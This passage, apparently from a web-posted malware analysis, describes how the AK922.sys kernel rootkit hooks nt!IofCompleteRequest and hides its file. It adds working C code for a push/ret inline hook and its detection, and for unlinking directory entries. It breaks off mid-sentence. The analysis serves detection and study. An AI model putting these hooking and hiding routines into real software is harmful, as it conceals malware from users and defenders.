Ak922.sys Analysis

Source: Internet
Author: User


 
This is a driver-level rootkit written in C. The driver hides the file named AK922.SYS from directory listings.

 

After the driver is loaded, it first obtains the address of nt!IofCompleteRequest and locates the offset of the process-name field within the process block (KPEB). The driver then completes the following operations in sequence:

 

1. Using nt!ObReferenceObjectByName, open the driver object \Driver\Disk and traverse all device objects created by that driver. The rootkit saves pointers to those Disk device objects whose names start with "dr" (the DR0, DR1, ... physical-disk devices) and whose device type is disk. At most eight device object pointers are saved; their addresses are used later for file hiding.

2. Create a device named \Device\AzyKit922. The intercepted version creates no symbolic link for it; later versions may add one so that a user-mode program can control which files are hidden.

 

3. Set the IRP dispatch routines and the driver unload routine.

 

4. Overwrite the first six bytes of the nt!IofCompleteRequest entry with push hook_IofCompleteRequest / ret, so that every call to the function lands in the hook. All of this driver's file hiding is done inside that hook routine for nt!IofCompleteRequest.
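As an added example (my code, not the rootkit's), the following C program shows the six-byte patch of step 4 from both sides: building and installing push <hook> / ret over a function entry while saving the displaced bytes, and the check a memory scanner or integrity tool would run to detect such a hook and recover where it points. The sample entry bytes, the hook address 0xF7A3D000 and the ntoskrnl address range are constructed for this example; the patch format (68 imm32 / C3) is what the text describes. A push imm32 / ret pair can only carry a 32-bit address, so this is a 32-bit x86 technique.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HOOK_LEN 6   /* push imm32 (5 bytes) + ret (1 byte) */

/* Constructed stand-in for the first bytes of a hooked kernel function: the
 * hot-patchable prologue typical of XP-era x86 kernels (mov edi,edi / push ebp /
 * mov ebp,esp / sub esp,10h / push ebx,esi,edi). Not bytes taken from the
 * rootkit or from any particular kernel build. */
static const uint8_t kSampleEntry[16] = {
    0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10,
    0x53, 0x56, 0x57, 0x90, 0x90, 0x90, 0x90, 0x90 };

/* Build the six-byte patch the text describes: 68 <imm32 little-endian> C3. */
void build_push_ret_patch(uint32_t target, uint8_t out[HOOK_LEN]) {
    out[0] = 0x68;                       /* push imm32 */
    out[1] = (uint8_t)(target);
    out[2] = (uint8_t)(target >> 8);
    out[3] = (uint8_t)(target >> 16);
    out[4] = (uint8_t)(target >> 24);
    out[5] = 0xC3;                       /* ret: "returns" into the pushed address */
}

/* Install the hook on a function entry. The displaced bytes are saved first so
 * the hook can later run "the original entry code". In a real kernel the write
 * goes through an MDL or with CR0.WP cleared; here `entry` is a plain buffer. */
void install_push_ret_hook(uint8_t *entry, uint32_t target, uint8_t saved[HOOK_LEN]) {
    uint8_t patch[HOOK_LEN];
    memcpy(saved, entry, HOOK_LEN);
    build_push_ret_patch(target, patch);
    memcpy(entry, patch, HOOK_LEN);
}

void remove_push_ret_hook(uint8_t *entry, const uint8_t saved[HOOK_LEN]) {
    memcpy(entry, saved, HOOK_LEN);
}

/* Detection side: a function entry that begins with push imm32 / ret is almost
 * never legitimate code, so a scanner can flag it and recover the hook target. */
int detect_push_ret_hook(const uint8_t *entry, uint32_t *target) {
    if (entry[0] != 0x68 || entry[5] != 0xC3) return 0;
    *target = (uint32_t)entry[1] | (uint32_t)entry[2] << 8 |
              (uint32_t)entry[3] << 16 | (uint32_t)entry[4] << 24;
    return 1;
}

/* Second signal: the recovered target should lie inside the image that owns the
 * hooked function (ntoskrnl for IofCompleteRequest). A target outside that range
 * points at foreign code such as a rootkit driver. Image range is an assumed input. */
int target_outside_image(uint32_t target, uint32_t image_base, uint32_t image_size) {
    return target < image_base || target - image_base >= image_size;
}

int main(void) {
    uint8_t entry[16], saved[HOOK_LEN];
    uint32_t target = 0;
    memcpy(entry, kSampleEntry, sizeof entry);
    install_push_ret_hook(entry, 0xF7A3D000u, saved);      /* assumed hook address */
    if (detect_push_ret_hook(entry, &target))
        printf("hook detected, target %08X, outside ntoskrnl: %d\n", (unsigned)target,
               target_outside_image(target, 0x804D7000u, 0x1F8000u)); /* assumed range */
    remove_push_ret_hook(entry, saved);
    printf("after unhook: %s\n", detect_push_ret_hook(entry, &target) ? "hooked" : "clean");
    return 0;
}
```

One consequence of a six-byte overwrite is that the saved bytes normally end in the middle of an instruction (here inside sub esp,10h), so a hook cannot simply execute the saved copy. Temporarily restoring the original bytes, calling through, and re-applying the patch is one way to satisfy "execute the original entry code", and would also explain why interrupts are disabled around that window; this is a plausible reading of steps 1 and 3 of the hook, not something the text states.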

 

After these operations, the driver saves its own driver object and device object pointers and returns success to the I/O manager. Whenever a file I/O operation in the system completes, the rootkit's hook runs and performs the following operations in sequence:

 

1. Save EFLAGS and disable interrupts.
2. Modify the completed IRP to hide the file.
3. Restore EFLAGS and execute the original entry code of nt!IofCompleteRequest.

 

The following is an analysis of how the rootkit hides files:

 

Process 1. Check whether the I/O request is IRP_MJ_DIRECTORY_CONTROL with MinorFunction IRP_MN_QUERY_DIRECTORY. If not, fall through to process 2. If so, determine which information-class structure the request asked for and walk the enumeration results the file system returned. If an entry named "ak922.sys" is found, the results are modified: depending on where that entry sits in the chain of records, the chain is either cut at that point or only that one node is unlinked.
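As an added example (my code, not the rootkit's) of the entry-unlinking logic in process 1, the following C program builds a constructed directory listing using a simplified version of the FILE_*_DIR_INFORMATION record layout (only NextEntryOffset, FileNameLength and FileName are modelled; the real records carry more fields before FileName) and removes a named entry. It goes slightly beyond the text by covering all three positions an entry can have: first (nothing points at it, so the remainder is slid down and the reported length shrinks), middle (the predecessor's NextEntryOffset is made to skip it) and last (the chain is cut at the predecessor). The buffer stands in for the IRP's output buffer and `len` for Irp->IoStatus.Information; it runs in user mode on any C compiler.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simplified stand-in for the FILE_*_DIR_INFORMATION records returned for
 * IRP_MN_QUERY_DIRECTORY: only the fields the unlinking touches. Real records
 * carry timestamps, sizes and attributes before FileName; chaining is the same. */
typedef struct DirEntry {
    uint32_t NextEntryOffset;  /* bytes from this record to the next, 0 = last */
    uint32_t FileNameLength;   /* length of FileName in bytes (UTF-16LE) */
    uint16_t FileName[1];      /* variable length, not NUL-terminated */
} DirEntry;

#define NEXT(e) ((DirEntry *)((uint8_t *)(e) + (e)->NextEntryOffset))

static size_t record_size(size_t name_bytes) {
    size_t sz = offsetof(DirEntry, FileName) + name_bytes;
    return (sz + 7) & ~(size_t)7;  /* records are 8-byte aligned */
}

/* NTFS reports names case-insensitively, so the comparison must be as well. */
static int name_matches(const DirEntry *e, const char *ascii) {
    size_t n = strlen(ascii);
    if (e->FileNameLength != n * 2) return 0;
    for (size_t i = 0; i < n; i++)
        if (e->FileName[i] > 0x7F ||
            tolower(e->FileName[i]) != tolower((unsigned char)ascii[i])) return 0;
    return 1;
}

/* Build a constructed listing from ASCII names; returns the byte count the
 * kernel would report in Irp->IoStatus.Information. */
size_t build_listing(uint8_t *buf, size_t cap, const char *const *names, size_t n) {
    size_t used = 0;
    DirEntry *last = NULL;
    for (size_t i = 0; i < n; i++) {
        size_t name_bytes = strlen(names[i]) * 2, sz = record_size(name_bytes);
        if (used + sz > cap) break;
        DirEntry *e = (DirEntry *)(buf + used);
        memset(e, 0, sz);
        e->FileNameLength = (uint32_t)name_bytes;
        for (size_t k = 0; names[i][k]; k++) e->FileName[k] = (uint8_t)names[i][k];
        if (last) last->NextEntryOffset = (uint32_t)((uint8_t *)e - (uint8_t *)last);
        last = e;
        used += sz;
    }
    return used;
}

/* Remove every entry named `target`. Returns how many were removed; *len is
 * the reported length and shrinks when the head or tail of the chain goes. */
int hide_entry(uint8_t *buf, size_t *len, const char *target) {
    int removed = 0;
    DirEntry *prev = NULL, *cur = (DirEntry *)buf;
    if (*len == 0) return 0;
    for (;;) {
        uint32_t next = cur->NextEntryOffset;
        if (!name_matches(cur, target)) {
            if (next == 0) return removed;
            prev = cur;
            cur = NEXT(cur);
            continue;
        }
        removed++;
        if (prev == NULL) {               /* head: slide the rest down over it */
            if (next == 0) { *len = 0; return removed; }
            *len -= next;
            memmove(buf, buf + next, *len);
            cur = (DirEntry *)buf;        /* re-examine the new head */
        } else if (next == 0) {           /* tail: cut the chain at prev */
            prev->NextEntryOffset = 0;
            *len = (size_t)((uint8_t *)cur - buf);
            return removed;
        } else {                          /* middle: make prev skip over cur */
            prev->NextEntryOffset += next;
            cur = NEXT(cur);
        }
    }
}

/* Copy the ASCII name of the idx-th reachable entry into out; 0 if none. */
int entry_name(const uint8_t *buf, size_t len, size_t idx, char *out, size_t cap) {
    const DirEntry *e = (const DirEntry *)buf;
    if (len == 0) return 0;
    for (size_t i = 0; i < idx; i++) {
        if (!e->NextEntryOffset) return 0;
        e = (const DirEntry *)((const uint8_t *)e + e->NextEntryOffset);
    }
    size_t n = e->FileNameLength / 2;
    if (n + 1 > cap) return 0;
    for (size_t i = 0; i < n; i++) out[i] = (char)e->FileName[i];
    out[n] = '\0';
    return 1;
}

int main(void) {
    static uint64_t raw[64];                       /* 8-byte aligned backing store */
    uint8_t *buf = (uint8_t *)raw;
    const char *const names[] = { ".", "..", "AK922.SYS", "ntoskrnl.exe" };  /* constructed */
    size_t len = build_listing(buf, sizeof raw, names, 4);
    char name[64];
    printf("removed %d\n", hide_entry(buf, &len, "ak922.sys"));
    for (size_t i = 0; entry_name(buf, len, i, name, sizeof name); i++) printf("%s\n", name);
    return 0;
}
```

Note that in the middle case the hidden record's bytes stay in the buffer; only the chain no longer reaches them. A detection tool with the raw buffer can therefore still compare the reachable chain against the bytes actually present, which is one reason cross-view comparisons catch this class of hiding.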

 

Process 2. Perform the following operations in sequence:
1. If the I/O request is not IRP_MJ_READ, the rootkit does not process it and returns directly.

 

2. Check whether the device object pointer passed in is one of the (at most eight) previously saved device objects created by \Driver\Disk,
